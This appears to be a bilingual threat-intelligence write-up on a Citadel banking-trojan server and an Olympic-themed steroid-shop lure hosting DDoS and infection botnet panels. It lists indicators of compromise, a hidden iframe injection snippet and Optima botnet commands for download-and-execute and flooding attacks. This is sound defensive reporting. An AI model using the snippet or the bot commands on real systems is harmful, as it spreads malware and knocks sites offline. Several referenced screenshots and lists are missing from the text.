Citadel Banker Malware

Troyan Citadel is an evolution from the famous ZEUS banker troyan. Citadel Developers have used the old features of Zeus malware adding new funcionalities for their criminals purposes. As video capturing from compromised machines (useful for viewing the user's action with virtual keyboards), sending stolen login credentials via the electronic messaging application Jabber, etc..


Has been found the Infrastructure of citadel malware version hosted at helikopterz1922.in domain that resolves 194.1.184.74 IP belonging to PROVITEX provider in Russia.

Troyan infection vector is located at URL: hxxp://helikopterz1922.in/xoiajcss/file.php

It downloads the malicious binary file:

hxxp://helikopterz1922.in/xoiajcss/files/tomat.exe

And also download Citadel settings configuration from the address:

hxxp://helikopterz1922.in/xoiajcss/files/tomatconfig.bin

After analyzing behavior of malicious binary file tomat.exe (MD5: 982e1a20030408cad318309a076a6539) In the infected computer were created this files:

%AppData%\Eqbi\tooz.exe
%AppData%\Naosif\iwox.mik
%AppData%\Naosif\iwox.tmp
%AppData%\Neep\xidi.yvr
%Temp%\tmp20ae17ad.bat

In addition to modifying system register and create Mutex to mark its presence on the compromised computer: Local \ {CA7FD20C-31FB-4F90-B762-F45413F09EC3}

Login control panel of this citadel troyan is located at URL:

hXXp://helikopterz1922.in/xoiajcss/cp.php?m=login

As shown in next screen capture:

In this Control Panel infrastructure there is also installed "VncFox 2012 - Citadel Software" Panel which is a Control Panel of Botnets of infected computers that use the VNC application to take full remote control of the compromised computers by accessing its desktop.

VNC control panel is accessed via the URL:

hXXp://helikopterz1922.in/xoiajcss/vnc/admin.php

MALICIUS IFRAMES INJECTION

At same server malware domain infrastructure there is located another Citadel control panel with the difference that is configured to inject malicious Iframes at Webs servers which access credentials have been captured by the Troyan.

This citadel Control Panel is located at:

hXXp://helikopterz1922.in/zaqiryt/cp.php?m=login

Citadel takes advantage of an old known Zeus Trojan functionality that were used to automatically captured login credentials to any FTP server that were opened session on the compromised machine.

With this compromised FTP credentials, Citadel Control Panel is able to connect via FTP to those servers to perform a recursive search of the public web folders * www * ',' public * ',' domain * ',' * host * ',' ht * docs ',' * site * ',' * web * ', where usually are hosted the websites to track files with extensions or names as ' index. * ',' *. js', '*. htm *', and inject code into with the malicious iframe that has set up for downloading Malware.

'< I F R A M E src="hXXp://example.com/" width=1 height=1 style="visibility: hidden">
',
Of this way servers websites will be modified and whenever they will be visited by a client , the malicious iframe will redirect users web surfing to the malicious Iframe and infection will start on the computer.

Below is showed a setup of Citadel Trojan configuration that is used to perform the malicious iframe injection

TROYANO BANCARIO CITADEL

El troyano Citadel  es una evolución de la conocida familia de troyanos bancarios ZEUS. Sus creadores han aprovechado las antiguas características de los troyanos Zeus añadiendo nuevas funcionalidades para sus fine criminales. Como son la captura de videos en los equipos comprometidos ( Util para visualizar la acción del usuario con los teclados virtuales) , el envio de credenciales de acceso robadas mediante la aplicación de mensajería electrónica Jabber , etc.

Se ha localizado la infraestructura de una de estas variantes del troyano Citadel alojado en el dominio helikopterz1922.in que resuelve la IP 194.1.184.74 perteneciente al proveedor  PROVITEX de Rusia.

El vector de infección del Malware se encuentra en la dirección:

 hXXp://helikopterz1922.in/xoiajcss/file.php

Que descarga el binario malicioso:

hXXp://helikopterz1922.in/xoiajcss/files/tomat.exe

Y también descarga la configuración del troyano Citadel desde la dirección:

hXXp://helikopterz1922.in/xoiajcss/files/tomatconfig.bin

Se ha analizado el comportamiento del binario malicioso tomat.exe (MD5: 982e1a20030408cad318309a076a6539) con los siguientes resultados:

En el equipo infectado crea los siguientes archivos:

%AppData%\Eqbi\tooz.exe

%AppData%\Naosif\iwox.mik

%AppData%\Naosif\iwox.tmp

%AppData%\Neep\xidi.yvr

%Temp%\tmp20ae17ad.bat

Además de modificar los registros del sistema crea el siguiente Mutex para marcar su presencia en el equipo comprometido: Local\{CA7FD20C-31FB-4F90-B762-F45413F09EC3}

El panel de control de acceso a al servidor se encuentra en la URL

hXXp://helikopterz1922.in/xoiajcss/cp.php?m=login

Tal como se muestra en la pantalla siguiente:

En la infraestructura del panel de Control también tienen instalado el Panel  “VncFox 2012 - Citadel Software” que se trata de un Panel de control de los equipos infectados Botnets mediante la aplicación VNC tomando el control remoto total de los equipos comprometidos accediendo a su escritorio.

El panel de control VNC se accede mediante la URL:

hXXp:// helikopterz1922.in/xoiajcss/vnc/admin.php 

INYECCION DE IFRAMES MALICIOSOS

En la misma infraestructura del servidor de este Malware se ha localizado otro panel de Control diferente del Citadel preparado para inyectar Iframes maliciosos en los servidores Webs cuyas credenciales de acceso han sido capturadas por el troyano.

Este Panel de Control del citadel esta localizado en la dirección:

hXXp://helikopterz1922.in/zaqiryt/cp.php?m=login

Citadel aprovecha una antigua funcionalidad del conocido troyano Zeus que capturaba  automáticamente las credenciales de acceso a cualquier servidor FTP que eran utilizadas en la máquina comprometida.

Con estas credenciales el Panel del Citadel es capaz de conectarse mediante FTP a dichos servidores para realizar una búsqueda  recursiva de las carpetas publicas *www*',  'public*', 'domain*', '*host*', 'ht*docs', '*site*','*web*', donde se alojan las páginas webs para rastrear los archivos que tengan nombre o extensiones del tipo 'index.*','*.js','*.htm*', e inyectar dentro de su código el iframe malicioso que tenga configurada para la descarga de Malware.

'< I F R A M E src="hXXp://example.com/" width=1 height=1 style="visibility: hidden">

',

Así pues estos servidores Webs serán modificados para que cada vez que sean visitados por algún cliente sea redireccionada la navegación del usuario hacia el Iframe malicioso y se inicie la infección en su equipo.

A continuación se muestra como la configuración del troyano Citadel para que realice la inyección del iframe malicioso deseado

Olimpic Malware: Ataque DDOS + INFECTION

Parece que los ciber-criminales no paran de escudriñar nuevas formas de propagar sus amenazas víricas a través de Internet.

En esta ocasión aprovechando la repercusión mediática de los juegos olímpicos de Londres 2012 han utilizado un ingenioso método para propagar sus muestras de Malware.

Para ello han rizado el rizo creando una supuesta pagina de venta de esteroides y anabolizantes por Internet. Un Mercado ilegal y que genera bastantes ganancias por la venta de estos productos no autorizados sin recetas y cuyos consumidores principalmente son individuos que tratan de emular a los deportistas olímpicos empleando estos compuestos químicos.

La web que han creado los criminales se llama:

hXXp://steroids-buy-anabolic.com/

y esta alojada en la IP 77.79.7.229 de Lituania.

Todavía sorprende más la maquiavélica mente de los criminales cuando al analizar dicha Web se ha localizado un complejo sistema de botnets para realizar ataques por denegación de servicio contra los sitios de Internet con cierta “reputación” dedicados a la venta ilegal de esteroides y así dejarlos inaccesibles a los posibles compradores. Que solo encontraran pues accesible la pagina maliciosa hXXp://steroids-buy-anabolic.com en la cual serán infectados por el Botnet OPTIMA convirtiéndose su equipo en una máquina zombie controlada por dicho Panel

Vamos a entrar en detalle en el analisis de esta infraestructura Botnet de ataques DDOS + INFECTION.

El BOTNET orientado a realizar ataques DDOS se llama Minza y se accede a su panel de Control mediante la URL  hXXp://steroids-buy-anabolic.com/minza/ tal como se observa en la captura:

Una vez que se ha accedido al Panel de Control se puede ver la lista de comandos que se han lanzado para realizar denegaciones de servicios contra las otras webs de comercio de esteroides.

Este BOTNET controla 19147 maquinas zombies para lanzar ataques sincronizados contra las paginas indicadas ordenando a dichos ordenadores que realicen peticiones masivas al mismo tiempo contra dichas Webs y así colapsar sus servidores.

Uno de estos sitios ilegales de venta de esteroides contra los que se ha realizado el ataque ha sido:

Los comandos que pueden ejecutarse desde el Panel de Control del Botnet son:

 

  Los cuales permiten que la máquina zombie realice denegaciones de servicio mediante desbordamiento TPC , UDP o HTTP , así como descargar otros ejecutables en la máquina infectada. Actualizar la versión del troyano , y también autoeliminarse para no dejar rastro de la infección en el equipo comprometido.

El Panel de Control además permite realizar un seguimiento de las acciones de los BOTS comprometidos.

Para la infraestructura de infección se ha empleado el Panel de Control del BOTNET OPTIMA creado por el grupo Darkness.

A este panel de control se accede mediante la URL:

hXXp://steroids-buy-anabolic.com/adm/

Y su pantalla de acceso muestra el siguiente aspecto:

Una vez que se ha accedido al Panel de Control nos aparece toda la información relativa a los botnets que contiene y las ordenes que están ejecutando en las máquinas infectadas.

El binario malicioso que descargaba en las máquinas comprometidas era:

exe=hXXp://steroids-buy-anabolic.com/upd1.exe

Que actualmente ha sido eliminado.

La primera infección se realizó el día 2012-05-25 a las16:14:47, unos meses anteriores al inicio de los juegos olímpicos,  y controla en total 7763 bots.

La lista de comandos que puede ejecutar en los equipos comprometidos son:

exe=http://host.com/exe.exe   -->  Descarga y ejecuta un binario malicioso

dd1=http://host.com/script.php|5  -->  Inicia ataque desbordamiento http

dd2=host.com|5   -->  Inicia ataque desbordamiento icmp

dd3=host.com:21  -->  Inicia ataque desbordamiento contra el puerto indicado

tot=10 -->  Sincroniza los bots con el tiempo indicado

vot=http://host.com/vote.php   -->  Voting

wtf   -->   Detiene la ejecución de estos comandos.

A continuación se muestra el registro de Bots que controla el Panel Optima:

Olimpic Malware: DDOS + INFECTION Attack.

It looks that cyber criminals do not stop searching new ways to spread its viral threats over Internet.

This time they have been taking advantage of the media coverage of the 2012 London Olympics Games. And have used an ingenious method to spread their malware samples with the olimpics promotion.

Criminals have created a false sales page offering steroids and anabolic online. in fact this Site is a pure lure. Selling Steroids is An illegal market that generate enormous profits selling these products unauthorized without prescription and whose consumers try to emulate Olympic athletes using these chemicals substances.

 The malicious URL is

hXXp://steroids-buy-anabolic.com/

and is hosted at the IP 77.79.7.229 from Lituania.

surprisingly, the Machiavellian minds of criminals when analyzing the malicious Web has been discovered a complex system of botnets for denial of service attacks against Internet sites with a certain "reputation" engaged in the illegal sale of steroids and leave them inaccessible to potential buyers.In this way buyers only will find accesible the malicious URL hxxp:// steroids-buy-anabolic.com where they will be infected by Botnet OPTIMA becoming a zombie machine controlled by this Botnet Panel

  

We will go into detail in the analysis of this infrastructure DDoS + INFECTION Botnet Attack.

The oriented BOTNET to perform DDOS attacks is called Minza and its control panel is accessible by the URL hxxp://steroids-buy-anabolic.com/minza/ as seen in the screenshot below:

Once accessed the Control Panel you can see the list of commands that have been released for Denial service atatcks against other websites of illegal steroids trade.

This BOTNET controls 19,147 zombie machines to launch synchronized attacks against the Sites indicated, ordering all the zombies computers to perform simultaneously mass petitions against these sites to collapse their servers.

One of the sites of steroid illegal commerce which the attack has been carried out were:

The commands that the botnet can run are:

Panel also allows to track the actions of compromised bots.

  

For the infection infraestructre criminals have used the Control Panel of OPTIMA BOTNET created by Darkness group.

 This control panel is accessed via the URL:

 hxxp://steroids-buy-anabolic.com/adm/

 And login screen looks like this:

Once accessed the Control Panel shows all information related to botnets and commands that are running on infected machines.

The malicious binary downloaded on compromised machines was:

exe=hXXp://steroids-buy-anabolic.com/upd1.exe

That now has been removed.

The first infection was recorded on 25.05.2012 at 16:14:47, a few months before starts of the Olympic Games, and control 7763 bots in total.

The list of commands that can be executed on the compromised computers are:

exe=http://host.com/exe.exe  -->   Download and execute file

dd1=http://host.com/script.php|5   -->  Start http attack

dd2=host.com|5   --> Start icmp attack

dd3=host.com:21   -->  Start port attack

tot=10   -->  Bots sync time

vot=http://host.com/vote.php  --> Voting

wtf   --> Stop all commands

Below is the record of Bots that controls Optima Bonet Panel: